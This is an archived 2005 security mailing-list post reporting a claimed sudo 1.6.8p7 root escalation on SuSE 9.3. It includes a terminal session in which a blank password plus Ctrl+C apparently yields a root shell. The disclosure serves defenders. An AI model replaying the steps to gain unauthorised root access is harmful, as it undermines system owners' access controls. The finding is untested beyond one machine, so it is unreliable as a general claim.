The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Tue, 31 May 2005 13:02:22 +0700
From: Xnuxer Security <xnusec@gmail.com.>
To: [email protected]
Subject: [XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3
Cc: [email protected], [email protected]
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
X-Virus-Scanned: antivirus-gw at tyumen.ru

Today, 31 May 2005, I found error with root privilige escalation in
Sudo version 1.6.8p7 that package installed with SuSE 9.3. Testing in
my machine, sudo appear not check is true when I press CTRL + C with
blank password and giving status SID as root privilige to SID user. I
got successful as root without need a password but only use blank
password and press CTRL + C. Please check my testing below in my SuSE
9.3 box:

client@mysuse:~> cat /etc/issue

Welcome to SuSE Linux 9.3 (i586) - Kernel \r (\l).


client@mysuse:~> id
uid=3D1000(client) gid=3D100(users) groups=3D16(dialout),33(video),100(user=
s)
client@mysuse:~> uname -a
Linux mysuse 2.6.11.4-20a-default #1 Wed Mar 23 21:52:37 UTC 2005 i686
i686 i386 GNU/Linux
client@mysuse:~> sudo -V
Sudo version 1.6.8p7
client@mysuse:~> sudo su
Password:                         <---- fake password and press ENTER
Sorry, try again.
Password:                          <---- blank password and press CTRL + C
mysuse:/home/client #
mysuse:/home/client # uname -a; id; uptime
Linux mysuse 2.6.11.4-20a-default #1 Wed Mar 23 21:52:37 UTC 2005 i686
i686 i386 GNU/Linux
uid=3D0(root) gid=3D0(root) groups=3D0(root)
 12:29pm  up   2:45,  3 users,  load average: 0.14, 0.29, 0.45
mysuse:/home/client #=20

Other sudo version is not check yet, about affect in other distro of
linux not check too but possible vulnerable, please check it. SuSE
Security still contacted by me.

Dani Firman Syah
------------------------------------------
Xnuxer Security of Indonesia
My Site: http://sec.us.to
My Email: [email protected] or [email protected]


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру